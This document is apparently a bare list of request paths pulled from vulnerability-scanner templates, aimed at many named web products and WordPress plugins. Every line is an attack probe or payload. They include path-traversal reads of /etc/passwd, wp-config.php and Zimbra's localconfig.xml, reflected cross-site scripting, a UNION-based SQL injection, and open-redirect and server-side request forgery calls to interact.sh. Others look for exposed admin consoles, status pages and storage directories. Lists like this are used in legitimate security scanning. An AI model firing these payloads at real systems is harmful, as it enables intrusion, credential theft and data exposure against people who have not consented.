/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter
/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
/webEdition/showTempFile.php?file=../../../../etc/passwd
/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php
/process/feries.php?fichier=../../../../../../../etc/passwd
/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/openwin.php?redirurl=http://interact.sh
/fw/mindex.do?url=./WEB-INF/web.xml%3f
/spaces/viewdefaultdecorator.action?decoratorName
/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match
/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh
/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
/__raw/services/server/info/server-info?output_mode=json
/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
/fcgi-bin/wgsetcgi
/html/repository
/services/user/values.xml?var=STATUS
/html/device-id
/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C
/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E
/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
/wp-content/uploads/wp-security-audit-log/failed-logins/
/tests/generate.php
/printenv.shtml?{{url_encode(payload)}}
/ssi/printenv.shtml?{{url_encode(payload)}}
/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/mobile/index.php
/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://
/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/osm/REGISTER.cmd
/osm_tiles/REGISTER.cmd
/wp-admin/admin.php?page=download_report&report=users&status=all
/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/hoteldruid/visualizza_tabelle.php?nsextt=x
/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13
/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php
/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019
/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php
/?mp_idx=%22;alert(%271%27);//
/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/
/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh
/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E
/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}
/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}
/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}
/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=
/calendar/calendar_form.php/
/index.php?SQ=0&srch=x
/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9
/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/
/auth/logout?continue=//interact.sh
/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>
/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=
/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6
/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1
/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1
/wa.exe?REPORT&z=4&
/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html
/config/
/nagios/cgi-bin/status.cgi
/cgi-bin/nagios4/status.cgi
/cgi-bin/nagios3/status.cgi
/libraries/joomla/database/
/storage/
/api_smartapp/storage/
/equipbid/storage/
/server/storage/
/intikal/storage/
/elocker_old/storage/
/config/cam_portal.cgi
/sqlite/
/sqlitemanager/
/haproxy-status
/haproxy?stats
/phpmyadmin/index.php?db=information_schema
/phpMyAdmin/index.php?db=information_schema
/tcpconfig.html
/zabbix/zabbix.php?action=dashboard.list
/rootDesc.xml
/tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>
/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>
/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/
/plugins/vkeyboard/vkeyboard.php?passformname={{url_encode(payload)}}
/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/
/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg
/wp-content/uploads/wpdm-cache/
/wp-content/plugins/wpmudev-updates/keys/
